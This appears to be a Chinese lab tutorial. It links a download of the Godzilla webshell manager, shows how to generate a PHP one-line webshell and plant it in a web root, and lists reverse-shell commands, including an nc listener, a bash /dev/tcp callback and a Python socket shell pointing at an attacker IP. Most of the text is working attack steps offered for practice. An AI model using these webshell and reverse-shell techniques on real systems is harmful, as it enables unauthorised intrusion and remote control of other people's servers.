先要搭建好LAMP,然后下载Java环境打开 “哥斯拉”
- 百度网盘提取码“哥斯拉”
- 链接:https://pan.baidu.com/s/1mlZQ-gDNwABF_ozcVApqXw
- 提取码:hv7v
然后用java打开,进去页面,左上角打开管理,生成一句话木马
把有效载荷换成php开头的,然后点击生成
然后设置以.php后缀的文件放入桌面
然后打开centos7 把文件拉入centos7并放入/var/www/html里面
打开浏览器输入centos7的IP/123.php,回车,页面不显
然后返回哥斯拉界面,点击左上角目标,添加
进去修改URl为你刚刚浏览器打开的那个网址,然后把有效载荷跟加密器修改,跟生成的时候一样
点击测试链接,出现这个就是成功了,然后确定点击添加
右击,进入
进入成功
在攻击主机上执行端口监听:
nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用
在目标主机上执行:
bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号
kali机:
centos 7:
在攻击主机上执行端口监听:
nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用
在目标主机上执行:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
修改ip为攻击机的ip,端口号
kali机:
centos7:
